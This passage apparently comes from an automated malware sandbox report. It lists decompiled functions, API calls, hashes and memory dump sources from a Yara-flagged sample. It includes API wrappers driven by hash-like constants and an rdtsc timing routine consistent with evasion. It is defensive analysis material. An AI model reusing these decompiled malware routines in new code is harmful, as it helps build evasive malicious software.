                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                              • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                                                                              • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                              • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0093FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                              • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                              • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                              • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0093FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                              • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                                                                                                                              • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                              • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0093FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                              • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                              • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                              • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0093FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                              • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                              • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                              • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004088B0, Relevance: .1, Instructions: 92COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                              			E004088B0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E00(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407010( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E00419CD0( &_v284, 0x104);
						E0041A340( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DD0(E00413D70(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407040( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070C0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                                                                                                                                              0x004088bb
                                                                                                                                                              0x004088c3
                                                                                                                                                              0x004088c5
                                                                                                                                                              0x004088ca
                                                                                                                                                              0x004088cf
                                                                                                                                                              0x004088e2
                                                                                                                                                              0x004088e7
                                                                                                                                                              0x004088f0
                                                                                                                                                              0x004088fc
                                                                                                                                                              0x0040890f
                                                                                                                                                              0x00408914
                                                                                                                                                              0x00408917
                                                                                                                                                              0x00408920
                                                                                                                                                              0x00408932
                                                                                                                                                              0x00408937
                                                                                                                                                              0x0040893c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040893e
                                                                                                                                                              0x00408942
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00408944
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00408942
                                                                                                                                                              0x00408946
                                                                                                                                                              0x00408949
                                                                                                                                                              0x0040894f
                                                                                                                                                              0x00408951
                                                                                                                                                              0x0040895c
                                                                                                                                                              0x00408961
                                                                                                                                                              0x00408964
                                                                                                                                                              0x00408971
                                                                                                                                                              0x0040897c
                                                                                                                                                              0x0040897e
                                                                                                                                                              0x00408984
                                                                                                                                                              0x00408988
                                                                                                                                                              0x0040898b
                                                                                                                                                              0x0040898b
                                                                                                                                                              0x00408992
                                                                                                                                                              0x00408995
                                                                                                                                                              0x0040899a
                                                                                                                                                              0x004089a7
                                                                                                                                                              0x004088d6
                                                                                                                                                              0x004088d6
                                                                                                                                                              0x004088d6

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                                                                                              • Instruction ID: aa626ceb7ef0a3bcdbf1efb1d9dc2f5a7bb3811b4857f0e914c6161f28eec10c
                                                                                                                                                              • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                                                                                              • Instruction Fuzzy Hash: FE213AB3D402085BDB10E6649D42BFF73AC9B50304F44057FF989A3182F638BB4987A6
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004184C2, Relevance: 3.0, APIs: 2, Instructions: 42memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                              			E004184C2(void* __eax, void* __edi, void* __eflags, intOrPtr _a4, void* _a8, int _a12, void* _a16) {
				char _t17;

				asm("xlatb");
				asm("fsubrp st5, st0");
				asm("in al, dx");
				if(__eflags < 0) {
					E00418DC0(__eax, __edi, __edi + 0xc7c, 0xcb40a710, 0, 0x36);
					ExitProcess(_a12);
				}
				asm("ficomp word [edx+0x55]");
				_t14 = _a4;
				_t4 = _t14 + 0xc74; // 0xc74
				E00418DC0(__eax, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t17 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t17;
			}




                                                                                                                                                              0x004184c7
                                                                                                                                                              0x004184c9
                                                                                                                                                              0x004184cb
                                                                                                                                                              0x004184cc
                                                                                                                                                              0x0041852a
                                                                                                                                                              0x00418538
                                                                                                                                                              0x00418538
                                                                                                                                                              0x004184ce
                                                                                                                                                              0x004184d3
                                                                                                                                                              0x004184df
                                                                                                                                                              0x004184e7
                                                                                                                                                              0x004184fd
                                                                                                                                                              0x00418501

                                                                                                                                                              APIs
                                                                                                                                                              • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                                                                                                              • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418538
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExitFreeHeapProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1180424539-0
                                                                                                                                                              • Opcode ID: 7f9261ba0bc6b0cd916af7b6e6accc6aa4b6cb2839bd5c38af30cf1a20ae24f3
                                                                                                                                                              • Instruction ID: 336a24befa922a063b9048b6daa1e313c500f060d366f48d004d60068fe4ef42
                                                                                                                                                              • Opcode Fuzzy Hash: 7f9261ba0bc6b0cd916af7b6e6accc6aa4b6cb2839bd5c38af30cf1a20ae24f3
                                                                                                                                                              • Instruction Fuzzy Hash: 1AF0A4B16002007FD724EF54CC45ED73369EF84350F11855EF9185B281DA31E9418AE0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E00419D20( &_v67, 0, 0x3f);
				E0041A900( &_v68, 3);
				_t12 = E00409B20(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E30(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409280(1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                                                                                                                              0x00407260
                                                                                                                                                              0x0040726f
                                                                                                                                                              0x00407273
                                                                                                                                                              0x0040727e
                                                                                                                                                              0x0040728e
                                                                                                                                                              0x0040729e
                                                                                                                                                              0x004072a3
                                                                                                                                                              0x004072aa
                                                                                                                                                              0x004072ad
                                                                                                                                                              0x004072ba
                                                                                                                                                              0x004072be
                                                                                                                                                              0x004072db
                                                                                                                                                              0x004072db
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004072dd
                                                                                                                                                              0x004072e2

                                                                                                                                                              APIs
                                                                                                                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessagePostThread
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1836367815-0
                                                                                                                                                              • Opcode ID: b429a28fbdaf8ade12dc58879e230a39c476b9a6de75f7f862eb8cc2ee54f132
                                                                                                                                                              • Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
                                                                                                                                                              • Opcode Fuzzy Hash: b429a28fbdaf8ade12dc58879e230a39c476b9a6de75f7f862eb8cc2ee54f132
                                                                                                                                                              • Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00418621, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                              			E00418621(void* __edx, WCHAR* _a4, WCHAR* _a8, struct _LUID* _a12) {
				intOrPtr _v0;
				int _t14;
				void* _t21;

				_push(es);
				_t11 = _v0;
				_t3 = _t11 + 0xc8c; // 0x8bec97e1
				E00418DC0(_t21, _v0, _t3,  *((intOrPtr*)(_v0 + 0xa18)), 0, 0x46);
				_t14 = LookupPrivilegeValueW(_a4, _a8, _a12); // executed
				return _t14;
			}






                                                                                                                                                              0x00418629
                                                                                                                                                              0x00418633
                                                                                                                                                              0x00418642
                                                                                                                                                              0x0041864a
                                                                                                                                                              0x00418660
                                                                                                                                                              0x00418664

                                                                                                                                                              APIs
                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LookupPrivilegeValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3899507212-0
                                                                                                                                                              • Opcode ID: 399899a4b91de17e6d297fe4dc82d0fea68e0f5f7307f8cbd88a2d8ed7a65fc0
                                                                                                                                                              • Instruction ID: 6f3b78acfad7cd69111e35170fefb2e61d1269f3af7e8e1fa3a8c166456d2147
                                                                                                                                                              • Opcode Fuzzy Hash: 399899a4b91de17e6d297fe4dc82d0fea68e0f5f7307f8cbd88a2d8ed7a65fc0
                                                                                                                                                              • Instruction Fuzzy Hash: CBF0E5792082806FD701DF669C80EE33B68DF45240F044599FCD94B202C934A806CBB0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004184D0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004184D0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DC0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                                                              0x004184df
                                                                                                                                                              0x004184e7
                                                                                                                                                              0x004184fd
                                                                                                                                                              0x00418501

                                                                                                                                                              APIs
                                                                                                                                                              • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                              • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                              • Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
                                                                                                                                                              • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                              • Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00418490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00418490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E00418DC0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                                                              0x004184a7
                                                                                                                                                              0x004184bd
                                                                                                                                                              0x004184c1

                                                                                                                                                              APIs
                                                                                                                                                              • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                              • Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
                                                                                                                                                              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                              • Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00418630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00418630(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				_t3 = _a4 + 0xc8c; // 0x8bec97e1
				E00418DC0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                                                              0x00418642
                                                                                                                                                              0x0041864a
                                                                                                                                                              0x00418660
                                                                                                                                                              0x00418664

                                                                                                                                                              APIs
                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LookupPrivilegeValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3899507212-0
                                                                                                                                                              • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                              • Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
                                                                                                                                                              • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                              • Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00418510, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00418510(intOrPtr _a4, int _a8) {
				intOrPtr _t8;
				void* _t10;

				_t5 = _a4;
				_t8 =  *((intOrPtr*)(_a4 + 0xa14));
				E00418DC0(_t10, _t5, _t5 + 0xc7c, _t8, 0, 0x36);
				ExitProcess(_a8);
			}





                                                                                                                                                              0x00418513
                                                                                                                                                              0x00418516
                                                                                                                                                              0x0041852a
                                                                                                                                                              0x00418538

                                                                                                                                                              APIs
                                                                                                                                                              • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418538
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExitProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                                              • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                              • Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
                                                                                                                                                              • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                              • Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Non-executed Functions

                                                                                                                                                              Function 0096C5F0, Relevance: 14.2, Strings: 11, Instructions: 424COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 55%
                                                                                                                                                              			E0096C5F0(intOrPtr _a4, char _a8, signed short _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				char _v544;
				char _v1064;
				char _v1068;
				char _v1069;
				signed short* _v1076;
				signed short _v1080;
				intOrPtr _v1084;
				signed short _v1086;
				char _v1088;
				char _v1092;
				signed short _v1096;
				char _v1100;
				char* _v1104;
				short _v1106;
				char _v1108;
				char _v1111;
				char _v1112;
				signed short _v1116;
				char _v1120;
				intOrPtr _v1124;
				short _v1126;
				char _v1128;
				intOrPtr _v1132;
				intOrPtr _v1136;
				intOrPtr _v1140;
				char _v1144;
				intOrPtr _v1148;
				short _v1150;
				char _v1152;
				char* _v1156;
				short _v1158;
				char _v1160;
				intOrPtr _v1164;
				intOrPtr _v1172;
				intOrPtr _v1176;
				char _v1180;
				intOrPtr _v1184;
				intOrPtr _v1188;
				intOrPtr _v1192;
				char* _v1196;
				intOrPtr _v1200;
				char _v1204;
				char _v1212;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t173;
				intOrPtr _t175;
				void* _t191;
				void* _t193;
				intOrPtr _t200;
				char _t215;
				void* _t226;
				signed short _t250;
				void* _t284;
				signed short _t286;
				unsigned int _t292;
				short _t294;
				signed int _t295;
				void* _t296;

				_t173 =  *0xa22088; // 0x7741ce3b
				_v8 = _t173 ^ _t295;
				_t175 = _a4;
				_t272 = _a8;
				_v1132 = _a16;
				_v1140 = _a20;
				_v1160 = 0;
				_v1158 = 0x208;
				_v1156 =  &_v1064;
				_t282 = 0;
				_t288 = 0;
				_t286 = _a12;
				_v1164 = _t175;
				_v1069 = 0;
				_v1068 = 0;
				_v1136 = 0;
				_v1088 = 0;
				_v1086 = 0;
				_v1084 = 0;
				_v1128 = 0;
				_v1126 = 0;
				_v1124 = 0;
				_v1144 = 0;
				if(_t175 == 0) {
					_t282 = 0;
					L66:
					_push(_t282);
					_push(_t286);
					_push(_t272);
					_push(_t175);
					E00993F92(0x33, 0, "SXS: %s() bad parameters\nSXS:   Map                : %p\nSXS:   Data               : %p\nSXS:   AssemblyRosterIndex: 0x%lx\nSXS:   Map->AssemblyCount : 0x%lx\n", "RtlpResolveAssemblyStorageMapEntry");
					_t288 = 0xc000000d;
					L18:
					if(_v1069 == 0) {
						L20:
						if(_v1084 != 0) {
							 *0x94e6f0(_v1084);
						}
						if(_v1068 != 0) {
							E0093F9F0(_v1068);
						}
						if(_v1136 != 0) {
							E0094E025(_t272,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v1136);
						}
						L23:
						return E0094E1B4(_t288, 0, _v8 ^ _t295, _t282, _t286, _t288);
					}
					L19:
					_v1120 = _v1144;
					_v1132(4,  &_v1120, _v1140);
					goto L20;
				}
